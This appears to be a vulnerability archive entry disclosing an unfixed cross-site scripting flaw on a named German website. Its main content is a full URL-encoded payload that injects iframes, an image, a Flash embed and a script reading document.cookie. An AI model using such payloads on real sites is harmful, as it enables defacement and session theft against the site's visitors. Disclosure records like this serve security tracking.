Security researcher hackebeil submitted a cross-site scripting (XSS) vulnerability affecting www.bbcgermany.de on 07/11/2010; at the time of submission the site ranked 613193 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 11/12/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.
Date submitted: 07/11/2010
Date published: 11/12/2011
Status: UNFIXED
Author: hackebeil
Domain: www.bbcgermany.de
Category: XSS
Pagerank: 613193
URL: http://www.bbcgermany.de/GERMANY/suche/search.php?q=%22%3E%3Cimg%20src%3Dhttp%3A%2F%2Fimg225.imagesh ack.us%2Fimg225%2F4465%2Fzombie2t.jpg%20%2F%3E%3Ciframe%20src%3Dhttp%3A%2F%2Fxssed.com%3E%3C%2Fifram e%3E%3Ciframe%20src%3Dhttp%3A%2F%2Fhackebeil.blogspot.com%3E%3C%2Fiframe%3E%3Cscript%3Ealert%28docum ent.cookie%29%3C%2Fscript%3E%3Cobject%20width%3D640%20height%3D385%3E%3Cparam%20name%3Dmovie%20value %3Dhttp%3A%2F%2Fwww.youtube.com%2Fv%2Fys6pUis-Wfw%3Ffs%3D1%26amp%3Bhl%3Dde_DE%3E%3C%2Fparam%3E%3Cpar am%20name%3DallowFullScreen%20value%3Dtrue%3E%3C%2Fparam%3E%3Cparam%20name%3Dallowscriptaccess%20val ue%3Dalways%3E%3C%2Fparam%3E%3Cembed%20src%3Dhttp%3A%2F%2Fwww.youtube.com%2Fv%2Fys6pUis-Wfw%3Ffs%3D1 %26amp%3Bhl%3Dde_DE%20type%3Dapplication%2Fx-shockwave-flash%20allowscriptaccess%3Dalways%20allowful lscreen%3Dtrue%20width%3D640%20height%3D385%3E%3C%2Fembed%3E%3C%2Fobject%3E%3Cbr%3E%3Ca%20href%3Dhtt p%3A%2F%2Fhackebeil.blogspot.com%3Ehackebeil.blogspot.com%3C%2Fa%3E |